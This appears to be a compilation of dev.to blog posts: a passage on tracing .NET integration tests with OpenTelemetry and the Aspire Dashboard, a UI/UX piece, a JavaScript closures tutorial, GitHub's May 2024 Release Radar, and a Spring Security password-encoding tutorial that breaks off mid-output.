It’s a very basic CRUD application; please feel free to investigate the details in the source code.
## Running Integration Tests
The tests are written based on the following technologies:
- `XUnit` - test framework
- `Testcontainers` - test dependencies management via Docker Engine and [.NET integration](https://dotnet.testcontainers.org/).
- `Alba` - author integration tests against ASP.NET Core HTTP endpoints. Alba scenarios actually exercise the full ASP.NET Core application by running HTTP requests through your ASP.NET system in memory using the built in [ASP.NET Core TestServer](https://learn.microsoft.com/en-us/aspnet/core/test/integration-tests).
I will explain how to instrument integration tests later. Right now, let’s see how it works.
```bash
dotnet test --filter TodosTests --verbosity normal
# Starting test execution, please wait...
# A total of 1 test files matched the specified pattern.
# [xUnit.net 00:00:00.00] xUnit.net VSTest Adapter v2.8.1+ce9211e970 (64-bit .NET 8.0.6)
# [xUnit.net 00:00:00.17] Discovering: Api.IntegrationTests
# [xUnit.net 00:00:00.24] Discovered: Api.IntegrationTests
# [xUnit.net 00:00:00.24] Starting: Api.IntegrationTests
# [xUnit.net 00:00:07.51] Finished: Api.IntegrationTests
# Test Run Successful.
# Total tests: 6
# Passed: 6
# Total time: 8.3519 Seconds
```
Here are output traces that can be found in Aspire Dashboard:
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/overview.png" style="margin: 15px;">
</center>
Open: [http://localhost:18888/](http://localhost:18888/) to see the results of Test Runs.
The interesting parts here are the “Warmup” and “TestRun” traces. The “Warmup” trace shows how much time it took to set up the `TestServer` host for _TodoApi_, the _PostgreSQL_ container, and the _Aspire Dashboard_ as a reusable container.
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/warmup.png" style="margin: 15px;">
</center>
As you can see, we have a lot of things going on during the automatic database migration.
Let’s open the “TestRun” traces. I’ve prepared two ways to run the integration tests. By default, `XUnit` runs tests within the same `TestCollection` sequentially, but we can override this behavior by using a custom test framework.
Here is sequential version:
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/seq-test-run.png" style="margin: 15px;">
</center>
And here is parallel version:
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/par-test-run.png" style="margin: 15px;">
</center>
💡Every test run is separated based on `service.instance.id`, whose value is also assigned to the custom `test.run_id` attribute. It is attached to every trace to make test runs discoverable. `test.run_id` is generated as a sequential GUID so that test runs are ordered in time. Basically, you can use the Aspire Dashboard’s replica-set drop-down to inspect each test run.
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/replica-set.png" style="margin: 15px;">
</center>
## Code Explained
As mentioned previously, I use `Alba` to set up the `TestServer` host.
In the code below, we are setting up a reusable `WebAppFixture`. It contains everything we need to test and interact with the `TestServer`.
The other thing worth mentioning is that we start an `Activity` named “TestRun” to group sub-activities for a test run.
```csharp
public class WebAppFixture : IAsyncLifetime
{
public static ActivitySource ActivitySource { get; } = new(TracerName);
private const string TracerName = "tests";
public IAlbaHost AlbaHost { get; private set; } = default!;
public static Activity ActivityForTestRun { get; private set; } = default!;
private readonly IContainer aspireDashboard = new ContainerBuilder()
.WithImage("mcr.microsoft.com/dotnet/aspire-dashboard:8.0.0")
.WithPortBinding(18888, 18888)
.WithPortBinding(18889, true)
.WithEnvironment("DOTNET_DASHBOARD_UNSECURED_ALLOW_ANONYMOUS", "true")
.WithWaitStrategy(
Wait.ForUnixContainer().UntilHttpRequestIsSucceeded(r => r.ForPort(18888))
)
.WithReuse(true)
.WithLabel("aspire-dashboard", "aspire-dashboard-reuse-id")
.Build();
private readonly PostgreSqlContainer db = new PostgreSqlBuilder()
.WithImage("postgres:16")
.Build();
public async Task InitializeAsync()
{
await this.BootstrapAsync();
ActivityForTestRun = ActivitySource.StartActivity("TestRun")!;
}
private async Task BootstrapAsync()
{
using var warmupTracerProvider = Sdk.CreateTracerProviderBuilder()
.AddSource(TracerName)
.Build();
using var activityForWarmup = ActivitySource.StartActivity("Warmup")!;
await this.aspireDashboard.StartAsync();
activityForWarmup?.AddEvent(new ActivityEvent("AspireDashboard Started."));
await this.db.StartAsync();
activityForWarmup?.AddEvent(new ActivityEvent("PostgresSql Started."));
var otelExporterEndpoint =
$"http://localhost:{this.aspireDashboard.GetMappedPublicPort(18889)}";
using var hostActivity = ActivitySource.StartActivity("Start Host")!;
this.AlbaHost = await Alba.AlbaHost.For<Program>(builder =>
{
builder.UseEnvironment("Test");
builder.UseSetting("OTEL_EXPORTER_OTLP_ENDPOINT", otelExporterEndpoint);
builder.UseSetting("OTEL_TRACES_SAMPLER", "always_on");
builder.UseSetting("OTEL_EXPORTER_OTLP_PROTOCOL", "grpc");
builder.UseSetting("OTEL_DOTNET_EXPERIMENTAL_OTLP_RETRY", "in_memory");
builder.UseSetting("OTEL_SERVICE_NAME", "test-host");
builder.UseSetting(
"Aspire:Npgsql:EntityFrameworkCore:PostgreSQL:ConnectionString",
this.db.GetConnectionString()
);
// ordered guid to sort test runs
var testRunId = NewId.Next().ToString();
builder.ConfigureServices(services =>
{
services
.AddOpenTelemetry()
.WithTracing(tracing =>
tracing
.SetResourceBuilder(
ResourceBuilder
.CreateDefault()
.AddService(TracerName, serviceInstanceId: testRunId)
)
.AddSource(TracerName)
.AddProcessor(new TestRunSpanProcessor(testRunId))
);
services.AddDbContextFactory<TodoDbContext>();
});
});
await this.AlbaHost.StartAsync();
activityForWarmup?.AddEvent(new ActivityEvent("Host Started."));
// wait for migration
await this
.AlbaHost.Services.GetServices<IHostedService>()
.FirstOrDefault(h => h.GetType() == typeof(DbInitializer))
.As<DbInitializer>()
.StartupTask;
}
public async Task DisposeAsync()
{
ActivityForTestRun?.Stop();
await this.AlbaHost.DisposeAsync();
await this.db.StopAsync();
}
}
```
We can define a collection of tests that will reuse the same instance of `WebAppFixture` via `Xunit.CollectionAttribute` like this:
```csharp
[CollectionDefinition(nameof(WebAppCollection))]
public sealed class WebAppCollection : ICollectionFixture<WebAppFixture>;
[Collection(nameof(WebAppCollection))]
public abstract class WebAppContext(WebAppFixture fixture)
{
public IAlbaHost Host { get; } = fixture.AlbaHost;
}
```
Now, we can use it by inheriting from `WebAppContext`:
```csharp
[TracePerTestRun]
public class TodosTests(WebAppFixture fixture) : WebAppContext(fixture)
{
private static readonly Func<
FluentAssertions.Equivalency.EquivalencyAssertionOptions<TodoItem>,
FluentAssertions.Equivalency.EquivalencyAssertionOptions<TodoItem>
> ExcludingTodoItemFields = cfg => cfg.Excluding(p => p.Id);
[Theory, AutoData]
public async Task GetTodos_SomeTodosExist_Ok(string todoItemTitle)
{
TodoItem item = new() { Title = todoItemTitle };
await this.AddTodo(item);
var result = await this.Host.GetAsJson<TodoItemViewModel[]>("/todos");
result.Should().NotBeNull();
result.Should().ContainEquivalentOf(item, ExcludingTodoItemFields);
}
[Fact]
public async Task PostTodos_ValidTodo_Ok()
{
var item = new TodoItem { Title = "I want to do this thing tomorrow" };
var result = await this.AddTodo(item);
result.Should().NotBeNull();
result!.IsComplete.Should().BeFalse();
}
[Theory, AutoData]
public async Task GetTodo_ExistingTodo_Ok(TodoItem item)
{
var dbTodo = await this.AddTodo(item);
var result = await this.Host.GetAsJson<TodoItemViewModel>($"/todos/{dbTodo.Id}");
result.Should().NotBeNull();
result.Should().BeEquivalentTo(item, ExcludingTodoItemFields);
}
[Theory, AutoData]
public async Task DeleteTodo_ExistingTodo_Ok(TodoItem item)
{
var dbTodo = await this.AddTodo(item);
await this.Host.Scenario(_ =>
{
_.Delete.Url($"/todos/{dbTodo.Id}");
_.StatusCodeShouldBeOk();
});
}
}
```
### Instrumenting Tests
You might have noticed the special attribute called `TracePerTestRun`. It is responsible for the OpenTelemetry test instrumentation.
`XUnit` provides the `BeforeAfterTestAttribute` to hook into the test execution lifecycle. We use it to start sub-activities under the parent "TestRun" activity.
```csharp
public abstract class BaseTraceTestAttribute : BeforeAfterTestAttribute { }
[AttributeUsage(
AttributeTargets.Class | AttributeTargets.Method,
AllowMultiple = false,
Inherited = true
)]
public sealed class TracePerTestRunAttribute : BaseTraceTestAttribute
{
private Activity? activityForThisTest;
public override void Before(MethodInfo methodUnderTest)
{
ArgumentNullException.ThrowIfNull(methodUnderTest);
this.activityForThisTest = WebAppFixture.ActivitySource.StartActivity(
methodUnderTest.Name,
ActivityKind.Internal,
WebAppFixture.ActivityForTestRun.Context
);
base.Before(methodUnderTest);
}
public override void After(MethodInfo methodUnderTest)
{
this.activityForThisTest?.Stop();
base.After(methodUnderTest);
}
}
```
Also, for our convenience and to group tests together, we want to add a `TestRunSpanProcessor`. It enriches every span with a `test.run_id` tag/attribute. Span processors are an extension point provided by the .NET OpenTelemetry instrumentation library.
```csharp
public class TestRunSpanProcessor(string testRunId) : BaseProcessor<Activity>
{
private readonly string testRunId = testRunId;
public override void OnStart(Activity data) => data?.SetTag("test.run_id", this.testRunId);
}
```
🙌 Hooray, now you know how to instrument automated tests with _OpenTelemetry_ and visualize the test runs via the _Aspire Dashboard_.
💡See [https://www.honeycomb.io/blog/monitoring-unit-tests-opentelemetry](https://www.honeycomb.io/blog/monitoring-unit-tests-opentelemetry) for more details on how to instrument unit tests with _OpenTelemetry_. That post originally inspired me to write this one.
## Conclusion
In this post, we’ve explored how to use OpenTelemetry to instrument our automated tests and visualize the data on the Aspire Dashboard. This approach provides valuable insights into how our code operates, helping us to identify potential bottlenecks and improve the overall performance and reliability of our applications.
We’ve seen how to set up integration tests for a basic CRUD application using `XUnit`, `Testcontainers`, and `Alba`. We’ve also learned how to run these tests both sequentially and in parallel, and how to view the results in the Aspire Dashboard.
By instrumenting our tests with OpenTelemetry, we can gain a deeper understanding of our code and its behavior under test conditions. This can lead to more robust, reliable, and efficient applications.
Remember, the source code for this post is available on GitHub at [https://github.com/NikiforovAll/tests-instrumentation-with-otel-and-aspire](https://github.com/NikiforovAll/tests-instrumentation-with-otel-and-aspire). Feel free to explore it further and use it as a starting point for your own test instrumentation.
Happy testing! 🚀
## References
- [https://opentelemetry.io/docs/languages/net/instrumentation/](https://opentelemetry.io/docs/languages/net/instrumentation/)
- [https://dotnet.testcontainers.org/](https://dotnet.testcontainers.org/)
- [https://jasperfx.github.io/alba/guide/gettingstarted.html](https://jasperfx.github.io/alba/guide/gettingstarted.html)
- [https://www.honeycomb.io/blog/monitoring-unit-tests-opentelemetry](https://www.honeycomb.io/blog/monitoring-unit-tests-opentelemetry)
- [https://github.com/testcontainers/testcontainers-dotnet](https://github.com/testcontainers/testcontainers-dotnet)

*by nikiforovall*
---

# Importance of UI/UX in web design: enhancing user experience and driving success

*Published 2024-06-06 on https://dev.to/liong/importance-of-uiux-in-web-design-enhancing-user-experience-and-driving-success-c72 (tags: website, uiux, malyasia, kualalumpur)*

When we talk about today's digital world, attention spans keep getting shorter. Millions of tabs and websites are competing for your one click, and a website needs something like a secret recipe to win attention even from those short spans. The secret recipe a website needs in its [website development](https://ithubtechnologies.com/website-development-malaysia/?utm_source=dev.to&utm_campaign=websitedevelopment&utm_id=Offpageseo+2024) is excellent UI/UX design. But the question that comes to mind is: what is UI/UX design, and why is it so important for the success of our website?
## What is UI?
UI stands for "User Interface": the elements through which a user interacts with a product. The visible elements are the buttons, menus, layouts, and overall look.
## What is UX?
UX stands for "User Experience". It refers to the whole journey a user takes on your website.
## UI/UX Design:
Imagine that UI/UX design is like a well-designed restaurant. The UI is the restaurant's design: its pleasant look, seating arrangement, and clear menu system. The UX is the friendly, attentive service, the smooth wait staff, and the overall feeling of satisfaction after leaving. Good UI/UX design is all about creating an experience that satisfies users so well that they keep coming back to the website for more.
## Let's explore why UI/UX design is the magical touch your website needs:
## 1. The First Impression Is the Last Impression: The Power of an Attractive UI
Think of your website as your digital storefront. The website itself determines whether customers and viewers are encouraged to enter or driven away. A website with a confusing, outdated UI design will automatically drive your customers away. This is where UI design comes in. A great UI is all about clear visuals, consistent branding, and high-quality imagery, which grab attention and create a positive first impression.
**Imagine this:** You land on a website selling handmade jewelry. The homepage is a feast for the eyes, showcasing beautiful product photos against a clean, elegant background. The navigation bar is clear and easy to find, allowing you to effortlessly browse different collections. This is the power of good UI: it creates a sense of trust and professionalism, making you more likely to explore further.
## 2. User-Friendly Navigation: The Key to Keeping Visitors Engaged
A website's visual appeal matters for attracting customers, but if users can't find what they're looking for, it's useless. This is where UX works best. UX is all about creating a website that is easy to use and navigate: clear menus, prominent key information, and working search functions are all very important.
**Think about it:** Suppose you're looking for a blog post on a news website. The homepage is crowded with ads, and the navigation menu is buried under an irrelevant pile of text. This is an example of bad UX. Good UX means users find what they need with the least possible effort.
## 3. Building Trust: The Value of Consistency
Imagine walking into a restaurant and finding mismatched seating while the staff aren't wearing a proper uniform to represent the restaurant. That wouldn't make a good first impression on customers either. The point is that websites work the same way: a consistent UI/UX design builds trust.
**Here's why:** A website with a consistent design language, using the same fonts, colors, and layout throughout, conveys professionalism and a distinct brand identity. This makes your brand easier for users to recognize and builds their trust in your website.
## 4. Increased Conversions: Turning Visitors into Customers
Once the design is done, a website's main goal is to convert visitors into loyal customers and drive more engagement. This is where UI/UX does its best work. Websites rely on clear, relevant CTAs (calls to action); well-placed buttons guide more users through your website and lead to better conversions.
**For example:** When your e-commerce website has a streamlined checkout process, a well-placed "Add to Cart" button, and clear product descriptions, it can turn visitors into buyers. Good UI/UX design not only engages customers but also guides them to take action.
## Conclusion: Happy Users and the Power of User Satisfaction
From the points above, it's clear that great UI/UX design is truly powerful when it's done carefully and correctly.
*by liong*
---

# Demystifying JavaScript Closures (Desvendando Closure Javascript)

*Published 2023-04-12 on https://dev.to/taisesoares/desvendando-closure-javascript-26nn (tags: javascript)*

Hello folks, let's talk a bit about JavaScript closures. What are they? What do they feed on? And how do we use them? 🤔
If you've heard of them but never quite understood what they are, or if you're new to the JavaScript world, let's dive into this topic and learn what closures are, what they're for, and how we can take advantage of them in our projects.
### So, what are they?
They're cannibal functions that feed on other functions 🤪 ... Jokes aside, here's the technical definition available on MDN:
> A closure is the combination of a function bundled together with references to its surrounding state (the lexical environment). In other words, a closure gives you access to an outer function's scope from an inner function - MDN Web Docs.
So a closure is a function that has access to the scope of an outer function even after that outer function has finished executing. This means the closure can "remember" and access the variables and arguments of its outer function, even after that function has returned. Cool, right?
In short, closures are simply functions that hold onto the context of other functions: functions defined inside the scope of another function, which therefore have access to the parent function's variables and arguments even after the parent has finished. (Tell me they aren't cannibals 😶)
Let's look at an example:
```javascript
function createAdder(X) {
return function(Y) {
return X + Y;
}
}
const addFive = createAdder(5);
console.log(addFive(10)); // Output: 15
```
Looking at this code for the first time can be confusing. After all, what is one function doing inside another? And why on earth do I need to return the function I declared in there? 🤯 ... Easy, folks, I promise to explain this as clearly as possible. Let's go.
In this example, `createAdder` is a function that takes a number `X` as an argument and returns a new function that adds `X` to a second argument `Y`. We then create a new function `addFive` using `createAdder(5)`. This new function takes a number `Y` as an argument and returns the sum of `X + Y`. When we call `addFive(10)`, the inner function uses the reference to `X` kept in its closure to add `X = 5` to `Y = 10`, returning 15.
Note that even though `createAdder` has finished executing, the inner function it returned still has access to the variable `X` defined in the outer function's scope. That's because the inner function is a closure that "remembers" the environment in which it was created, including all the variables and functions available in that environment.
### OK, but what is this good for? 😐
Beyond the uses we've already mentioned, closures can help make your code more modular and organized. They let you create functions with specific behaviors without having to duplicate code, and they also help keep variables private when they shouldn't be accessed directly.
For example, suppose you're building a login app with JavaScript and want to create a function that checks whether the username and password are correct. You can create an inner verification function that keeps references to the user's credentials as a closure, preventing other parts of the code from accessing those credentials directly:
```javascript
function createLoginChecker(username, password) {
return function() {
return username === "admin" && password === "1234";
}
}
const checkLogin = createLoginChecker("admin", "1234")
console.log(checkLogin()); // Output: true
```
Note that the `createLoginChecker` function returns an inner function that checks whether the username and password match the credentials stored in its variables. The inner function is a closure that "remembers" the user's credentials and checks them every time the function is called. This lets you create private functions that can't be accessed by other parts of the code.
Another advantage of closures is that they can be used to create functions that retain state. For example, suppose you're building an app that needs to track how many times a user has clicked a button. You can create a function that keeps the internal counter's state as a closure:
```javascript
function createClickCounter() {
let count = 0;
return function() {
count++;
console.log(`Button clicked ${count} times`);
}
}
const clickHandler = createClickCounter();
// Calling the function 3 times
clickHandler(); // Output: Button clicked 1 times
clickHandler(); // Output: Button clicked 2 times
clickHandler(); // Output: Button clicked 3 times
```
In this example, the `createClickCounter` function returns an inner function that holds the state of the `count` counter. Each time the inner function is called, it increments the counter and logs a message to the console. The closure lets the inner function keep the counter's state between calls, allowing you to track how many times the button was clicked.
### OK, but where can I see this used out in the wild?
So far we've only shown made-up examples, but how about looking at a famous framework that uses closures? ... I randomly picked an example from our beloved ReactJs: one of its most popular functions, `useState`.
```javascript
export function useState<S>(
initialState: (() => S) | S,
): [S, Dispatch<BasicStateAction<S>>] {
const dispatcher = resolveDispatcher();
return dispatcher.useState(initialState);
}
```
Source: [ReactJs](https://github.com/facebook/react/blob/main/packages/react/src/ReactHooks.js#L99)
### OK, but useState isn't a closure 🤨
It's true that the `useState` function isn't a closure in itself, but it can return a closure as the result of calling the `useState` function returned by the `dispatcher`. (Gotcha there, huh 😏)
It's used to create internal state in React components. Its implementation uses a closure to store the current state value, as well as a function to update it. The function returned by `useState` is a closure that can be used to update the internal state value.
See, when you call the `dispatcher`'s `useState` function, which is returned by the React module's `useState`, a closure is created that captures the current state value and the function that updates the state. That closure is returned by React's `useState` as the first element of the returned array. The closure is a function that has access to the `state` variable and the `setState` function defined inside the scope of the `useState` function.
On to the example:
```javascript
function Counter() {
const [count, setCount] = useState(0);
function handleClick() {
setCount(count + 1);
}
return (
<div>
<p>You clicked {count} times</p>
<button onClick={handleClick}>
Click me
</button>
</div>
);
}
```
Note that `useState` is called with an initial value of 0 and returns a closure that captures the current value of `count` along with the `setCount` function. The closure is assigned to `count` and `setCount`, allowing the `handleClick` function to update the value of `count` using the update function returned by the closure.
This way, `useState` returns a closure that lets the state be updated through the update function captured by the closure. The closure is created inside the `useState` function and captures the current state value and the function that updates it, which gives the closure access to the scope in which it was created and allows it to update the state safely.

### Finally, let's wrap up
In practice, what a closure does is create an association between data and a function that works on that data.
Although closures are tied to functional programming, this also relates to the object-oriented paradigm, where data and methods work together. By exploring the scope and context of functions, it becomes even clearer how to apply some design patterns, such as Strategy and Dependency Inversion, as well as how to build events and callbacks.
So, did you enjoy learning about closures? I hope so! Now that you know what closures are, what they're for, and how to use them, it's time to put that knowledge into practice in your projects. Good luck and see you next time. 🤗
*by taisesoares*
---

# Release Radar · May 2024: Major updates from the open source community

*Published 2024-06-06 on https://dev.to/github/release-radar-may-2024-edition-major-updates-from-the-open-source-community-4oj3 (tags: github, community, news, developers)*

While the Northern Hemisphere springs into a fresh era 🌷, the Southern says goodbye to Fall (or Autumn as we say Down Under 🍂). As the seasons change, our developers are changing, updating, and shipping their projects. There are a tonne of great projects featured here, everything from weekend hobbies to world-changing technology. Let's take a look at our staff picks for this month's Release Radar: a roundup of the open source projects that have shipped major version updates.
## Angular 18.0
Those building mobile and desktop web applications might be familiar with [Angular](https://github.com/angular/angular), a development platform for building using TypeScript, JavaScript, and other languages. The latest release brings a new home for [Angular Developers with their new website](https://angular.dev/), experimental support for zoneless change detection, lots of server-side rendering improvements, more stable controls, and lots more. Check out all the changes and what these mean for Angular devs on the [Angular blog post](https://blog.angular.dev/angular-v18-is-now-available-e79d5ac0affe).
{% youtube DK8M-ZFjaMw %}
## Web Check 1.0
Looking for comprehensive, on-demand intelligence for any website? Look no further than [Web Check](https://github.com/Lissy93/web-check). With [Web Check](https://web-check.xyz/), you can see insights for any website, uncover potential attack vectors, analyse server architecture, view security configurations, and see what technologies drive a particular site. Congrats on shipping out the first major version 🥳.

## Apache Skywalking 10.0
Are you working on microservices, cloud native, and container-based architectures? Then you need to check out [Apache Skywalking](https://skywalking.apache.org/). It's an Application Performance Monitoring (APM) system, that provides monitoring, tracing, and diagnosing capabilities for distributed systems in Cloud Native architectures. This latest update has hundreds of changes including support for Java 21 runtime, new functions and parameters, the addition of Golang as a supported language for AMQP, Kafka, RocketMQ, and Pulsar, support for multiple labels in metrics, and tonnes more. [Check out all changes in the very comprehensive release notes](https://github.com/apache/skywalking/releases/tag/v10.0.0). All the Apache Skywalking metrics are available via Grafana.

## Grafana 11.0
Speaking of metrics and Grafana, this popular project gets a major update too. As shown in the image above, Grafana is a data visualisation and composable observability platform. With Grafana you can query, visualise, alert on, and understand your metrics wherever that data may sit. The latest update adds lots of new features and enhancements such as a slightly refreshed UI, reducing the set of fields that could trigger an alert state change, the removal of Loki's API restrictions on resource calls, and lots more. Check out all the [changes in the changelog](https://github.com/grafana/grafana/releases/tag/v11.0.0).

## Tasmota 14.0
Firmware and embedded systems engineers will love this project; Tasmota is firmware for ESP8266 and ESP32 based devices that allows you to more easily configure your devices. The catch with this new update is that direct migration from versions earlier than 8.1 is no longer supported. If you're using anything higher, you can migrate directly to this latest version. Tasmota 14.0 adds a bunch of new commands, support for new hardware such as temperature and pressure sensors, and lots more. Read up on all the new devices, modules, and how to migrate in the [Tasmota release notes](https://github.com/arendst/Tasmota/releases/tag/v14.0.0).
{% github arendst/Tasmota %}
## croc 10.0
Do you have more than one computer? Ever had 'fun' trying to get files from one computer to the other? [Croc](https://github.com/schollz/croc) is here to save you. This CLI tool allows any two computers to securely transfer files and folders. You can transfer multiple files, including cross-platform (Windows, Linux, Mac), and you can use a proxy. The newest version of [croc](https://schollz.com/tinker/croc6/) has a few of the usual :bug: fixes and has a new way to define ports.

## ρμ 4.0
Pronounced rho mu, [ρμ](https://github.com/cicirello/rho-mu) is a Java library of randomization enhancements and other math utilities. In this latest update, [ρμ](https://rho-mu.cicirello.org/) makes improvements to the generation of random pairs and triples of distinct integers, adds support for generating streams of random pairs and triples of distinct integers, adds methods for efficiently shuffling arrays and lists, removes a couple of previously deprecated classes, and includes some improvements to internal library code. Check out the [changelog](https://github.com/cicirello/rho-mu/blob/main/CHANGELOG.md) for all the updates.
{% github cicirello/rho-mu %}
## Social Switch 1.0
Have you ever tried to share a social media post, and your friend on the other end can't see it because they don't have an account for that particular platform? Or maybe you want to look at a post and remain anonymous, [Social Switch](https://github.com/claromes/socialswitch) is here for you. Available as a Chrome, Firefox, or Firefox for Android extension, Social Switch allows you to share social media links from Instagram and TikTok URLs and users don't need to reveal their identity or log into their accounts. Congrats to the team on shipping your very first version 🥳.

## Simple Icons 12.0
Having [featured Simple Icons in the past](https://github.blog/2020-12-07-release-radar-dec-2020/), this project continues to make updates. [Simple Icons](https://github.com/simple-icons/simple-icons) now has over 3100 free SVG icons for all your favourite brands. The latest update provides more than a dozen new icons, and some revamped icons too. Check them all out and download them for your projects via the [Simple Icons website](https://simpleicons.org/).

## NetBox 4.0
If you're a network engineer, then you need to know about [NetBox](https://netboxlabs.com/oss/netbox/). It exists to empower you, and provides an accessible data model for all things networked. There's a single robust user interface and programmable APIs for everything from cable maps to device configurations. This latest update changes the format for GraphQL queries, a completely refreshed UI, support for dynamic REST API fields, and lots more. [Read up on all the breaking changes and dig into the migration guide](https://github.com/netbox-community/netbox/releases/tag/v4.0.0) to ensure you're up to date and compatible.

## Release Radar May 2024
Well, that’s all for this edition. Thank you to everyone who submitted a project to be featured :pray:. We loved reading about the great things you're all working on. Whether your project was featured here or not, congratulations to everyone who shipped a new release :tada:, regardless of whether you shipped your project's first version, or you launched 18.0.
If you missed our last Release Radar, check out the amazing open source projects that released major version projects in [April](https://dev.to/github/release-radar-april-2024-edition-major-updates-from-the-open-source-community-37k1). We love featuring projects submitted by the community. If you're working on an open source project and shipping a major version soon, we'd love to hear from you. Check out the [Release Radar repository](https://releaseradar.github.com/), and [submit your project to be featured in the GitHub Release Radar](https://github.com/github/release-radar/issues/new?assignees=MishManners&labels=&template=release-radar-request.yml&title=%5BRelease+Radar+Request%5D+%3Ctitle%3E).
| mishmanners |
---

# Spring Security Basics: Implementing Authentication and Authorization - Part 4

*Published 2024-06-06 on https://dev.to/bytegrapher/spring-security-basics-implementing-authentication-and-authorization-part-4-1830*
Up to this point, we have used the default user provided by Spring Security to log in to the application. In the previous sections, we added some sample users to the `application_users` table. Moving forward, we will use this table for logging in to the application. To achieve this, we need to configure Spring Security to recognize that the details of the application users are stored in the `application_users` table. This will enable Spring Security to retrieve and verify user credentials during authentication and authorization.
For that let's do the following steps:
1. Add the password encoder bean
2. Update the plain text password to encrypted password
3. Configure user details service
4. Configure the authentication provider
### Add the password encoder bean
In the `SecurityConfig` class, add a bean of type `PasswordEncoder`:
```java
package com.gintophilip.springauth.web;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.web.SecurityFilterChain;
@Configuration
@EnableWebSecurity
public class SecurityConfig {
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity securityConfig) throws Exception {
return securityConfig
.authorizeHttpRequests(auth->
auth.requestMatchers("/api/hello")
.permitAll()
.requestMatchers("/api/admin").hasRole("ADMIN")
.anyRequest().authenticated()
).formLogin(Customizer.withDefaults())
.build();
}
@Bean
public PasswordEncoder passwordEncoder(){
return new BCryptPasswordEncoder();
}
}
```
The `BCryptPasswordEncoder` is the preferred password encoder: it applies a random salt to every password and uses an adaptive work factor, so the same password never produces the same stored hash twice.
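BCrypt itself ships with Spring Security rather than the JDK, but the `PasswordEncoder` contract it fulfills can be illustrated with plain Java: `encode` produces a salted, one-way hash (a different string on every call), and `matches` verifies a raw password against a previously stored hash. The sketch below is purely illustrative (SHA-256 plus a random salt, no adjustable work factor), and the class name `ToyPasswordEncoder` is made up for this article; real applications should keep using `BCryptPasswordEncoder`:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.util.Base64;

// Illustrative only: mimics the PasswordEncoder contract (encode/matches)
// with a salted SHA-256 hash. Real code should keep using BCryptPasswordEncoder.
public class ToyPasswordEncoder {

    private static final SecureRandom RANDOM = new SecureRandom();

    // Stored format: base64(salt) + ":" + base64(sha256(salt + password))
    public static String encode(String rawPassword) {
        byte[] salt = new byte[16];
        RANDOM.nextBytes(salt);
        return Base64.getEncoder().encodeToString(salt) + ":"
                + Base64.getEncoder().encodeToString(hash(salt, rawPassword));
    }

    public static boolean matches(String rawPassword, String encoded) {
        String[] parts = encoded.split(":", 2);
        byte[] salt = Base64.getDecoder().decode(parts[0]);
        byte[] expected = Base64.getDecoder().decode(parts[1]);
        // Constant-time comparison to avoid timing leaks
        return MessageDigest.isEqual(expected, hash(salt, rawPassword));
    }

    private static byte[] hash(byte[] salt, String rawPassword) {
        try {
            MessageDigest digest = MessageDigest.getInstance("SHA-256");
            digest.update(salt);
            digest.update(rawPassword.getBytes(StandardCharsets.UTF_8));
            return digest.digest();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String first = encode("123456");
        String second = encode("123456");
        System.out.println(!first.equals(second));    // true: random salt => unique hashes
        System.out.println(matches("123456", first)); // true
        System.out.println(matches("wrong", first));  // false
    }
}
```

This is also why a stored password can never be "decrypted": login works by re-hashing the submitted password with the stored salt and comparing the results.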
### Update the plain text password to encrypted password.
While creating the sample users, the passwords were stored as plain text. In this step, let's update them to a hashed (encoded) form.
>You may wonder why user creation is handled in this manner and not through an API. The reason is to minimize the overhead of creating APIs for every function. The primary goal of this article is to demonstrate the fundamentals of integrating authentication and authorization mechanisms.
1. Drop the `user_roles` table
2. Drop the `roles` table
3. Drop the `application_user` table
4. Add the `PasswordEncoder` class dependency in `DataBaseUtilityRunner`
5. Encode the password
**Drop the**`user_roles`**table**
```bash
spring_access_db=# drop table user_roles;
```
**Drop the**`roles`**table**
```bash
spring_access_db=# drop table roles;
```
**Drop the**`application_user`**table**
```bash
spring_access_db=# drop table application_user;
```
>The drop table commands were executed via the psql CLI
Also, make the following change in the `DataBaseUtilityRunner` class.
*Update the lines*
```java
user1.setPassword("123456");
adminUser.setPassword("12345");
```
as follows.
```java
user1.setPassword(passwordEncoder.encode("123456"));
adminUser.setPassword(passwordEncoder.encode("12345"));
```
The `DataBaseUtilityRunner` after modification is as follows,
```java
package com.gintophilip.springauth;
import com.gintophilip.springauth.entities.ApplicationUser;
import com.gintophilip.springauth.entities.Roles;
import com.gintophilip.springauth.repository.RoleRepository;
import com.gintophilip.springauth.repository.UserRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.CommandLineRunner;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.stereotype.Component;
@Component
public class DataBaseUtilityRunner implements CommandLineRunner {
@Autowired
PasswordEncoder passwordEncoder;
@Autowired
UserRepository usersRepository;
@Autowired
RoleRepository rolesRepository;
@Override
public void run(String... args) throws Exception {
try {
Roles userRole = new Roles();
userRole.setRoleName("USER");
Roles adminRole = new Roles();
adminRole.setRoleName("ADMIN");
rolesRepository.save(userRole);
rolesRepository.save(adminRole);
ApplicationUser user1 = new ApplicationUser();
user1.setFirstName("John");
user1.setEmail("john@test.com");
user1.setPassword(passwordEncoder.encode("123456"));
user1.setRole(userRole);
ApplicationUser adminUser = new ApplicationUser();
adminUser.setFirstName("sam");
adminUser.setEmail("sam@test.com");
adminUser.setPassword(passwordEncoder.encode("12345"));
adminUser.setRole(adminRole);
usersRepository.save(user1);
usersRepository.save(adminUser);
}catch (Exception exception){
// ignored: the sample roles and users may already exist from a previous run
}
}
}
```
Run the application and query the `application_user` table. You will see that the passwords are now encoded instead of stored as plain text.
```bash
spring_access_db=# select * from application_user;
id | email | first_name | last_name | password
-----+---------------+------------+-----------+--------------------------------------------------------------
